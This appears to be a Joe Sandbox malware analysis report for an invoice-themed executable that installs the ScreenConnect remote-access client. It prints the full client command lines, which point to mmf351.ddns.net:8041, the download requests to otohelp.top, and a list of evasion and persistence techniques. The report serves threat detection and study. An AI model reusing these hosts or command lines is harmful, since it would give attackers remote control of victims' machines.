Edit tour

Windows Analysis Report
E_BILL0041272508.exe

Overview

General Information

Sample name:	E_BILL0041272508.exe
Analysis ID:	1523876
MD5:	9ffc98a16aba4841e94b24ccabf219ab
SHA1:	31925b39e3255446a3b0803da2f75337329f6a65
SHA256:	453e8d5897ce07b29bc8df2312686cca8d2df37bcf43b1e7e0d5c8b0ee585a3f
Tags:	exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	20
Range:	0 - 100

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

.NET source code references suspicious native API functions

Contains functionality to hide user accounts

Deletes keys which are related to windows safe boot (disables safe mode boot)

Enables network access during safeboot for specific services

Initial sample is a PE file and has a suspicious name

Reads the Security eventlog

Reads the System eventlog

Uses dynamic DNS services

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

EXE planting / hijacking vulnerabilities found

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Modifies existing windows services

PE file contains an invalid checksum

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Stores large binary data to the registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Classification

Process Tree

System is w10x64

E_BILL0041272508.exe (PID: 3568 cmdline: "C:\Users\user\Desktop\E_BILL0041272508.exe" MD5: 9FFC98A16ABA4841E94B24CCABF219AB)

dfsvc.exe (PID: 6456 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)

ScreenConnect.WindowsClient.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)

ScreenConnect.ClientService.exe (PID: 1340 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)

svchost.exe (PID: 3524 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ScreenConnect.ClientService.exe (PID: 1672 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)

ScreenConnect.WindowsClient.exe (PID: 2736 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "83265b87-0d31-430d-be3a-51c1a25f31d5" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000002.00000002.4002929791.0000023CE6080000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: dfsvc.exe PID: 6456	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6552	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.ClientService.exe PID: 1340	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.0.ScreenConnect.WindowsClient.exe.1e0000.0.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Sigma Signatures

System Summary

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Source: Network Connection

Author: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.6, DestinationIsIpv6: false, DestinationPort: 49714, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6456, Protocol: tcp, SourceIp: 79.110.49.16, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3524, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Possible Windows executable sent when remote host claims to send html content

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T06:25:23.034206+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.6	49723	TCP
2024-10-02T06:25:24.139539+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.6	49725	TCP
2024-10-02T06:25:27.919859+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.6	49730	TCP
2024-10-02T06:25:29.012255+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.6	49731	TCP
2024-10-02T06:25:30.764881+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.6	49734	TCP
2024-10-02T06:25:31.855577+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.6	49736	TCP
2024-10-02T06:25:34.080744+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.6	49737	TCP
2024-10-02T06:25:35.668872+0200	2009897	1	A Network Trojan was detected	79.110.49.16	443	192.168.2.6	49738	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: E_BILL0041272508.exe	ReversingLabs: Detection: 18%
Source: E_BILL0041272508.exe	Virustotal: Detection: 13%			Perma Link

Cryptography

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Code function: 0_2_009B1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,

0_2_009B1000

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to behavior

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Unpacked PE file: 7.2.ScreenConnect.ClientService.exe.5020000.1.unpack

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to behavior

Uses 32bit PE files

Source: E_BILL0041272508.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

PE / OLE file has a valid certificate

Source: E_BILL0041272508.exe

Static PE information: certificate valid

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 79.110.49.16:443 -> 192.168.2.6:49714 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: E_BILL0041272508.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC367000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385098018.00000000021E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: E_BILL0041272508.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC363000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.2382809510.0000000002B12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2435126842.0000000002241000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2435049004.00000000020E0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.2378580945.000000000002D000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC35F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6DD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2387012518.000000001B472000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC35F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6DD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2387012518.000000001B472000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC367000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385098018.00000000021E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC47C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.2383094950.0000000005022000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr

Spreading

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Code function: 0_2_009B4A4B FindFirstFileExA,

0_2_009B4A4B

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49731
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49734
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49723
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49725
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49730
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49736
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49738
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.16:443 -> 192.168.2.6:49737

Enables network access during safeboot for specific services

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Registry value created: NULL Service

Jump to behavior

Uses dynamic DNS services

Source: unknown

DNS query: name: mmf351.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49740 -> 79.110.49.16:8041

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: otohelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 79.110.49.16 79.110.49.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: OTAVANET-ASCZ OTAVANET-ASCZ

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: otohelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: otohelp.topAccept-Encoding: gzip
